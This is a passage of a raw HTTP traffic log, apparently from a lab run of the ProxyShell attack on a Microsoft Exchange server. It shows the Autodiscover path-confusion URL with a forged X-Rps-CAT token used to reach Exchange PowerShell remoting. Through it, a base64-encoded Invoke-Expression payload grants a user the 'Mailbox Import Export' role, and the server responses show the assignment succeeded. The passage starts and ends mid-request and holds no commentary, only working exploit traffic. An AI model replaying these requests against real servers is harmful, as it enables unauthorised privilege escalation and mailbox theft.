/Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 6913 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:59E045EF-9A35-47D4-A084-AFB26E373A19</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command</a:Action><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:CommandLine CommandId="388572AC-50FE-4DB0-9095-3F5CDE8291DD"><rsp:Command>Invoke-Expression</rsp:Command><rsp:Arguments>AAAAAAAAAAMAAAAAAAAAAAMAAA8DAgAAAAYQAgC6YAPcjEr4Tq3xAS9ylt/5rHKFOP5QsE2QlT9c3oKR3e+7vzxPYmogUmVmSWQ9IjAiPgogIDxNUz4KICAgIDxPYmogTj0iUG93ZXJTaGVsbCIgUmVmSWQ9IjEiPgogICAgICA8TVM+CiAgICAgICAgPE9iaiBOPSJDbWRzIiBSZWZJZD0iMiI+CiAgICAgICAgICA8VE4gUmVmSWQ9IjAiPgogICAgICAgICAgICA8VD5TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNPYmplY3QsIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24sIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1XV08L1Q+CiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgICAgICA8L1ROPgogICAgICAgICAgPExTVD4KICAgICAgICAgICAgPE9iaiBSZWZJZD0iMyI+CiAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgPFMgTj0iQ21kIj5OZXctTWFuYWdlbWVudFJvbGVBc3NpZ25tZW50PC9TPgogICAgICAgICAgICAgICAgPEIgTj0iSXNTY3JpcHQiPmZhbHNlPC9CPgogICAgICAgICAgICAgICAgPE5pbCBOPSJVc2VMb2NhbFNjb3BlIiAvPgogICAgICAgICAgICAgICAgPE9iaiBOPSJNZXJnZU15UmVzdWx0IiBSZWZJZD0iNCI+CiAgICAgICAgICAgICAgICAgIDxUTiBSZWZJZD0iMSI+CiAgICAgICAgICAgICAgICAgICAgPFQ+U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXMuUGlwZWxpbmVSZXN1bHRUeXBlczwvVD4KICAgICAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uRW51bTwvVD4KICAgICAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uVmFsdWVUeXBlPC9UPgogICAgICAgICAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgICAgICAgICAgICAgIDwvVE4+CiAgICAgICAgICAgICAgICAgIDxUb1N0cmluZz5Ob25lPC9Ub1N0cmluZz4KICAgICAgICAgICAgICAgICAgPEkzMj4wPC9JMzI+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDxPYmogTj0iTWVyZ2VUb1Jlc3VsdCIgUmVmSWQ9IjUiPgogICAgICAgICAgICAgICAgICA8VE5SZWYgUmVmSWQ9IjEiIC8+CiAgICAgICAgICAgICAgICAgIDxUb1N0cmluZz5Ob25lPC9Ub1N0cmluZz4KICAgICAgICAgICAgICAgICAgPEkzMj4wPC9JMzI+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDxPYmogTj0iTWVyZ2VQcmV2aW91c1Jlc3VsdHMiIFJlZklkPSI2Ij4KICAgICAgICAgICAgICAgICAgPFROUmVmIFJlZklkPSIxIiAvPgogICAgICAgICAgICAgICAgICA8VG9TdHJpbmc+Tm9uZTwvVG9TdHJpbmc+CiAgICAgICAgICAgICAgICAgIDxJMzI+MDwvSTMyPgogICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8T2JqIE49Ik1lcmdlRXJyb3IiIFJlZklkPSI3Ij4KICAgICAgICAgICAgICAgICAgPFROUmVmIFJlZklkPSIxIiAvPgogICAgICAgICAgICAgICAgICA8VG9TdHJpbmc+Tm9uZTwvVG9TdHJpbmc+CiAgICAgICAgICAgICAgICAgIDxJMzI+MDwvSTMyPgogICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8T2JqIE49Ik1lcmdlV2FybmluZyIgUmVmSWQ9IjgiPgogICAgICAgICAgICAgICAgICA8VE5SZWYgUmVmSWQ9IjEiIC8+CiAgICAgICAgICAgICAgICAgIDxUb1N0cmluZz5Ob25lPC9Ub1N0cmluZz4KICAgICAgICAgICAgICAgICAgPEkzMj4wPC9JMzI+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDxPYmogTj0iTWVyZ2VWZXJib3NlIiBSZWZJZD0iOSI+CiAgICAgICAgICAgICAgICAgIDxUTlJlZiBSZWZJZD0iMSIgLz4KICAgICAgICAgICAgICAgICAgPFRvU3RyaW5nPk5vbmU8L1RvU3RyaW5nPgogICAgICAgICAgICAgICAgICA8STMyPjA8L0kzMj4KICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPE9iaiBOPSJNZXJnZURlYnVnIiBSZWZJZD0iMTAiPgogICAgICAgICAgICAgICAgICA8VE5SZWYgUmVmSWQ9IjEiIC8+CiAgICAgICAgICAgICAgICAgIDxUb1N0cmluZz5Ob25lPC9Ub1N0cmluZz4KICAgICAgICAgICAgICAgICAgPEkzMj4wPC9JMzI+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDxPYmogTj0iQXJncyIgUmVmSWQ9IjExIj4KICAgICAgICAgICAgICAgICAgPFROUmVmIFJlZklkPSIwIiAvPgogICAgICAgICAgICAgICAgICA8TFNUPgogICAgICAgICAgICAgICAgICAgIDxPYmogUmVmSWQ9IjEwMCI+CiAgICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICAgIDxTIE49Ik4iPi1Sb2xlPC9TPgogICAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJWIj5NYWlsYm94IEltcG9ydCBFeHBvcnQ8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgICAgIDxPYmogUmVmSWQ9IjEwMSI+CiAgICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICAgIDxTIE49Ik4iPi1Vc2VyPC9TPgogICAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJWIj5zbWNpbnR5cmVAZXhjaGcubGFuPC9TPgogICAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgICAgPC9MU1Q+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICA8L09iaj4KICAgICAgICAgIDwvTFNUPgogICAgICAgIDwvT2JqPgogICAgICAgIDxCIE49IklzTmVzdGVkIj5mYWxzZTwvQj4KICAgICAgICA8TmlsIE49Ikhpc3RvcnkiIC8+CiAgICAgICAgPEIgTj0iUmVkaXJlY3RTaGVsbEVycm9yT3V0cHV0UGlwZSI+dHJ1ZTwvQj4KICAgICAgPC9NUz4KICAgIDwvT2JqPgogICAgPEIgTj0iTm9JbnB1dCI+dHJ1ZTwvQj4KICAgIDxPYmogTj0iQXBhcnRtZW50U3RhdGUiIFJlZklkPSIyMyI+CiAgICAgIDxUTiBSZWZJZD0iMiI+CiAgICAgICAgPFQ+U3lzdGVtLlRocmVhZGluZy5BcGFydG1lbnRTdGF0ZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uRW51bTwvVD4KICAgICAgICA8VD5TeXN0ZW0uVmFsdWVUeXBlPC9UPgogICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgIDwvVE4+CiAgICAgIDxUb1N0cmluZz5Vbmtub3duPC9Ub1N0cmluZz4KICAgICAgPEkzMj4yPC9JMzI+CiAgICA8L09iaj4KICAgIDxPYmogTj0iUmVtb3RlU3RyZWFtT3B0aW9ucyIgUmVmSWQ9IjI0Ij4KICAgICAgPFROIFJlZklkPSIzIj4KICAgICAgICA8VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJlbW90ZVN0cmVhbU9wdGlvbnM8L1Q+CiAgICAgICAgPFQ+U3lzdGVtLkVudW08L1Q+CiAgICAgICAgPFQ+U3lzdGVtLlZhbHVlVHlwZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uT2JqZWN0PC9UPgogICAgICA8L1ROPgogICAgICA8VG9TdHJpbmc+MDwvVG9TdHJpbmc+CiAgICAgIDxJMzI+MDwvSTMyPgogICAgPC9PYmo+CiAgICA8QiBOPSJBZGRUb0hpc3RvcnkiPnRydWU8L0I+CiAgICA8T2JqIE49Ikhvc3RJbmZvIiBSZWZJZD0iMjUiPgogICAgICA8TVM+CiAgICAgICAgPEIgTj0iX2lzSG9zdE51bGwiPnRydWU8L0I+CiAgICAgICAgPEIgTj0iX2lzSG9zdFVJTnVsbCI+dHJ1ZTwvQj4KICAgICAgICA8QiBOPSJfaXNIb3N0UmF3VUlOdWxsIj50cnVlPC9CPgogICAgICAgIDxCIE49Il91c2VSdW5zcGFjZUhvc3QiPnRydWU8L0I+CiAgICAgIDwvTVM+CiAgICA8L09iaj4KICAgIDxCIE49IklzTmVzdGVkIj5mYWxzZTwvQj4KICA8L01TPgo8L09iaj4K</rsp:Arguments></rsp:CommandLine></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: 8c3ee978-8252-4b27-9c45-8d9253c69a0b X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:43 GMT Content-Length: 847 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/CommandResponse</a:Action><a:MessageID>uuid:D3F71350-2B28-4879-BDE0-71466F47FDCD</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:59E045EF-9A35-47D4-A084-AFB26E373A19</a:RelatesTo></s:Header><s:Body><rsp:CommandResponse><rsp:CommandId>388572AC-50FE-4DB0-9095-3F5CDE8291DD</rsp:CommandId></rsp:CommandResponse></s:Body></s:Envelope> #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 1814 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:6820E227-BC61-4206-84B3-8FDA64983B74</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream CommandId="388572AC-50FE-4DB0-9095-3F5CDE8291DD">stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: 33023bc0-f1eb-43b2-b307-3b2f404b5192 X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:44 GMT Content-Length: 4349 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:61D39315-D845-4FEC-BCB8-5415CEF5A38A</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:6820E227-BC61-4206-84B3-8FDA64983B74</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout" CommandId="388572AC-50FE-4DB0-9095-3F5CDE8291DD">AAAAAAAAAUwAAAAAAAAAAAMAAAjzAQAAAAQQBAC6YAPcjEr4Tq3xAS9ylt/5rHKFOP5QsE2QlT9c3oKR3e+7vzxPYmogUmVmSWQ9IjAiPjxUTiBSZWZJZD0iMCI+PFQ+TWljcm9zb2Z0LkV4Y2hhbmdlLkRhdGEuRGlyZWN0b3J5Lk1hbmFnZW1lbnQuRXhjaGFuZ2VSb2xlQXNzaWdubWVudFByZXNlbnRhdGlvbjwvVD48VD5NaWNyb3NvZnQuRXhjaGFuZ2UuRGF0YS5EaXJlY3RvcnkuTWFuYWdlbWVudC5BRFByZXNlbnRhdGlvbk9iamVjdDwvVD48VD5NaWNyb3NvZnQuRXhjaGFuZ2UuRGF0YS5EaXJlY3RvcnkuQURPYmplY3Q8L1Q+PFQ+TWljcm9zb2Z0LkV4Y2hhbmdlLkRhdGEuRGlyZWN0b3J5LkFEUmF3RW50cnk8L1Q+PFQ+TWljcm9zb2Z0LkV4Y2hhbmdlLkRhdGEuQ29uZmlndXJhYmxlT2JqZWN0PC9UPjxUPlN5c3RlbS5PYmplY3Q8L1Q+PC9UTj48VG9TdHJpbmc+TWFpbGJveCBJbXBvcnQgRXhwb3J0LXNtY2ludHlyZS0yPC9Ub1N0cmluZz48UHJvcHM+PFMgTj0iRGF0YU9iamVjdCI+TWFpbGJveCBJbXBvcnQgRXhwb3J0LXNtY2ludHlyZS0yPC9TPjxTIE49IlVzZXIiPmV4Y2hnLmxhbi9Vc2Vycy9zbWNpbnR5cmU8L1M+PFMgTj0iQXNzaWdubWVudE1ldGhvZCI+RGlyZWN0PC9TPjxTIE49IklkZW50aXR5Ij5NYWlsYm94IEltcG9ydCBFeHBvcnQtc21jaW50eXJlLTI8L1M+PE5pbCBOPSJFZmZlY3RpdmVVc2VyTmFtZSIgLz48TmlsIE49IkFzc2lnbm1lbnRDaGFpbiIgLz48UyBOPSJSb2xlQXNzaWduZWVUeXBlIj5Vc2VyPC9TPjxTIE49IlJvbGVBc3NpZ25lZSI+ZXhjaGcubGFuL1VzZXJzL3NtY2ludHlyZTwvUz48UyBOPSJSb2xlIj5NYWlsYm94IEltcG9ydCBFeHBvcnQ8L1M+PFMgTj0iUm9sZUFzc2lnbm1lbnREZWxlZ2F0aW9uVHlwZSI+UmVndWxhcjwvUz48TmlsIE49IkN1c3RvbVJlY2lwaWVudFdyaXRlU2NvcGUiIC8+PE5pbCBOPSJDdXN0b21Db25maWdXcml0ZVNjb3BlIiAvPjxTIE49IlJlY2lwaWVudFJlYWRTY29wZSI+T3JnYW5pemF0aW9uPC9TPjxTIE49IkNvbmZpZ1JlYWRTY29wZSI+T3JnYW5pemF0aW9uQ29uZmlnPC9TPjxTIE49IlJlY2lwaWVudFdyaXRlU2NvcGUiPk9yZ2FuaXphdGlvbjwvUz48UyBOPSJDb25maWdXcml0ZVNjb3BlIj5Pcmdhbml6YXRpb25Db25maWc8L1M+PEIgTj0iRW5hYmxlZCI+dHJ1ZTwvQj48UyBOPSJSb2xlQXNzaWduZWVOYW1lIj5zbWNpbnR5cmU8L1M+PEIgTj0iSXNWYWxpZCI+dHJ1ZTwvQj48UyBOPSJFeGNoYW5nZVZlcnNpb24iPjAuMTEgKDE0LjAuNTUwLjApPC9TPjxTIE49Ik5hbWUiPk1haWxib3ggSW1wb3J0IEV4cG9ydC1zbWNpbnR5cmUtMjwvUz48UyBOPSJEaXN0aW5ndWlzaGVkTmFtZSI+Q049TWFpbGJveCBJbXBvcnQgRXhwb3J0LXNtY2ludHlyZS0yLENOPVJvbGUgQXNzaWdubWVudHMsQ049UkJBQyxDTj1UYXJnZXQgT3JnLENOPU1pY3Jvc29mdCBFeGNoYW5nZSxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWV4Y2hnLERDPWxhbjwvUz48RyBOPSJHdWlkIj44NjRjODRlYy1jZDU2LTQ4NjAtOTNmYi03N2U2Y2IzNTZjNzQ8L0c+PFMgTj0iT2JqZWN0Q2F0ZWdvcnkiPmV4Y2hnLmxhbi9Db25maWd1cmF0aW9uL1NjaGVtYS9tcy1FeGNoLVJvbGUtQXNzaWdubWVudDwvUz48T2JqIE49Ik9iamVjdENsYXNzIiBSZWZJZD0iMSI+PFROIFJlZklkPSIxIj48VD5NaWNyb3NvZnQuRXhjaGFuZ2UuRGF0YS5NdWx0aVZhbHVlZFByb3BlcnR5YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dPC9UPjxUPk1pY3Jvc29mdC5FeGNoYW5nZS5EYXRhLk11bHRpVmFsdWVkUHJvcGVydHlCYXNlPC9UPjxUPlN5c3RlbS5PYmplY3Q8L1Q+PC9UTj48TFNUPjxTPnRvcDwvUz48Uz5tc0V4Y2hSb2xlQXNzaWdubWVudDwvUz48L0xTVD48L09iaj48RFQgTj0iV2hlbkNoYW5nZWQiPjIwMjEtMDgtMThUMTU6MTQ6NDQtMDQ6MDA8L0RUPjxEVCBOPSJXaGVuQ3JlYXRlZCI+MjAyMS0wOC0xOFQxNToxNDo0NC0wNDowMDwvRFQ+PERUIE49IldoZW5DaGFuZ2VkVVRDIj4yMDIxLTA4LTE4VDE5OjE0OjQ0WjwvRFQ+PERUIE49IldoZW5DcmVhdGVkVVRDIj4yMDIxLTA4LTE4VDE5OjE0OjQ0WjwvRFQ+PFMgTj0iT3JnYW5pemF0aW9uSWQiPjwvUz48UyBOPSJJZCI+TWFpbGJveCBJbXBvcnQgRXhwb3J0LXNtY2ludHlyZS0yPC9TPjxTIE49Ik9yaWdpbmF0aW5nU2VydmVyIj5XSU4tQlBJRDk1QUNRN0UuZXhjaGcubGFuPC9TPjxTIE49Ik9iamVjdFN0YXRlIj5VbmNoYW5nZWQ8L1M+PC9Qcm9wcz48L09iaj4=</rsp:Stream><rsp:Stream Name="stdout" CommandId="388572AC-50FE-4DB0-9095-3F5CDE8291DD">AAAAAAAAAU0AAAAAAAAAAAMAAABnAQAAAAYQBAC6YAPcjEr4Tq3xAS9ylt/5rHKFOP5QsE2QlT9c3oKR3e+7vzxPYmogUmVmSWQ9IjAiPjxNUz48STMyIE49IlBpcGVsaW5lU3RhdGUiPjQ8L0kzMj48L01TPjwvT2JqPg==</rsp:Stream><rsp:CommandState CommandId="388572AC-50FE-4DB0-9095-3F5CDE8291DD" State="http://schemas.microsoft.com/wbem/wsman/1/windows/shell/CommandState/Done"><rsp:ExitCode>0</rsp:ExitCode></rsp:CommandState></rsp:ReceiveResponse></s:Body></s:Envelope> #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 1768 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:6A35ACDB-6355-4909-AD57-E1FEDDEE1AC8</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Signal</a:Action><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Signal CommandId="388572AC-50FE-4DB0-9095-3F5CDE8291DD"><rsp:Code>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/signal/terminate</rsp:Code></rsp:Signal></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: 6f10d0b2-ad9e-4f7d-a30c-691e73181922 X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:44 GMT Content-Length: 757 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/SignalResponse</a:Action><a:MessageID>uuid:E96974F4-8D77-4D0C-B0F9-B0A374B0914C</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:6A35ACDB-6355-4909-AD57-E1FEDDEE1AC8</a:RelatesTo></s:Header><s:Body><rsp:SignalResponse/></s:Body></s:Envelope> #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 1592 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" 